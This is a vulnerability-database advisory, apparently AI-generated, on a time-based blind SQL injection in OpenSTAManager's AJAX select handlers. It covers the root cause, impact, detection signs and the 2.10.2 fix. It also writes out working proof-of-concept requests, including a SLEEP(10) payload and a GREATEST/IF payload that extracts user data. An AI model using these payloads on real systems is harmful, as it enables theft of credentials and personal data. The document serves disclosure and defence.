
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-28805 is a Time-Based Blind SQL Injection vulnerability in OpenSTAManager affecting all versions up to and including 2.10.1. Multiple AJAX select handlers fail to sanitize the options[stato] GET parameter before concatenating it directly into SQL WHERE clauses, enabling authenticated attackers to inject arbitrary SQL statements. The vulnerability was published on April 1, 2026, and patched in version 2.10.2 released shortly after. It carries a CVSS v3.1 base score of 8.8 (High) (GitHub Advisory).
The root cause is CWE-89 (Improper Neutralization of Special Elements used in an SQL Command). In three affected modules — Preventivi (modules/preventivi/ajax/select.php, line 60), Ordini (modules/ordini/ajax/select.php, line 52), and Contratti (modules/contratti/ajax/select.php, line 57) — the $stato variable is read from $superselect['stato'] and concatenated directly into SQL WHERE clauses as a bare expression (e.g., $where[] = '('.$stato.' = 1)'). Although the input passes through HTMLPurifier, that library is designed for XSS prevention and does not strip SQL keywords (SELECT, SLEEP, IF, UNION) or SQL-significant characters ((, ), =, '). The > character is stripped by HTMLPurifier but can be bypassed using MySQL's GREATEST() function, allowing time-based boolean extraction of arbitrary data (GitHub Advisory, OSM Security Advisory).
A successful exploit allows an authenticated attacker to extract the entire MySQL database contents, including usernames, bcrypt password hashes, personally identifiable information (PII), and financial records such as invoices, quotes, contracts, and payments. Integrity is also at risk, as MySQL subquery capabilities (INSERT/UPDATE) may allow data modification. Availability can be degraded by injecting resource-intensive SLEEP() calls or heavy queries, causing denial of service against the database server (GitHub Advisory).
A detailed proof-of-concept (PoC) is publicly available in the official GitHub Security Advisory, including step-by-step HTTP requests with crafted options[stato] payloads (e.g., 1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1) that trigger measurable SLEEP delays and enable character-by-character data extraction. Exploitation requires only a valid user account at any privilege level and network access to the application. The EPSS score is approximately 0.031% (4th percentile), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing (GitHub Advisory, OSM Security Advisory).
/index.php with valid credentials (op=login&username=<user>&password=<pass>). Capture the PHPSESSID cookie from the Set-Cookie response header.GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=is_pianificabile
Cookie: PHPSESSID=<session>Then send the injection payload and observe a ~10-second delay:GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1
Cookie: PHPSESSID=<session>IF() and GREATEST() (to bypass > stripping) to extract data character by character. Example to determine username length:GET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(IF((GREATEST(LENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1)),3%2B1)%3DLENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1))),SLEEP(2),0)))a)+AND+(1/ajax_select.php?op=ordini-cliente and /ajax_select.php?op=contratti using their respective payload structures to confirm and broaden data extraction scope (GitHub Advisory, OSM Security Advisory)./ajax_select.php with options[stato] parameter values containing SQL keywords (SLEEP, SELECT, IF, GREATEST, UNION) or encoded SQL characters (%2B, %3D, %28, %29); repeated requests to the same endpoint with incrementally varying payloads (indicative of binary search extraction)./ajax_select.php?op=preventivi, /ajax_select.php?op=ordini-cliente, or /ajax_select.php?op=contratti with anomalously long options[stato] parameter values; response times significantly exceeding baseline (>2 seconds) for these endpoints.SLEEP() function calls or unusually complex subqueries originating from the application's database user; repeated queries against zz_users or other sensitive tables outside normal application patterns (GitHub Advisory).Update OpenSTAManager to version 2.10.2 or later, which addresses this vulnerability by implementing allowlist validation for the $stato parameter in all three affected modules and wrapping column names in backticks (OSM Release v2.10.2). The fix (commits 679c40f and 50b9089) validates $stato against a predefined list of permitted column names (e.g., ['is_pianificabile', 'is_completato', 'is_fatturabile', 'is_concluso']) before use in SQL, falling back to a safe default if the value is not in the allowlist (Patch Commit 1, Patch Commit 2). As an interim measure, restrict access to AJAX endpoints by IP or authentication controls, and monitor database activity for anomalous SLEEP() calls or bulk data queries.
The vulnerability was discovered and reported by security researcher Omar Ramirez (GitHub: ormzro), who published a detailed advisory including root cause analysis, proof-of-concept requests, and remediation options (OSM Security Advisory). Coverage appeared on The Hacker Wire and was indexed by INCIBE-CERT and other vulnerability tracking platforms shortly after disclosure (GitHub Advisory). No significant broader community debate or vendor controversy has been noted.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."